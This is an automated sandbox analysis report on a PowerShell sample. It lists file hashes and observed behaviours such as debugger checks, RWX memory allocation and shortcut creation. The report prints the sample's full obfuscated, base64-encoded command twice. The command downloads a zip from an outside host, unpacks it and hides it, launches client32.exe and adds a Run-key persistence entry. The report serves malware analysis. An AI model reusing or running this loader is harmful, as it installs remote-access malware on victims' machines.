Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 14, 2023, 5:09 p.m.	May 14, 2023, 5:36 p.m.

Size	4.7KB
Type	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5	`d7bd6a17466dbe1e448956b0018ad94d`
SHA256	`5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669`
CRC32	`5152DC39`
ssdeep	`96:X6rCx5wroLBS4ch7S3NF7wJJTZW+1/BrbBEnwOeelJXk6ccWeCfNYV:q2fwroXY7S3NF7wplBrlEnwkxccWq`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\loc.ps1
940
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAEMAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA=
  2188

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 14, 2023, 5:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:09 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 14, 2023, 5:09 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 14, 2023, 5:09 p.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027bca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027c520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 14, 2023, 5:09 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (24 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:09 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAE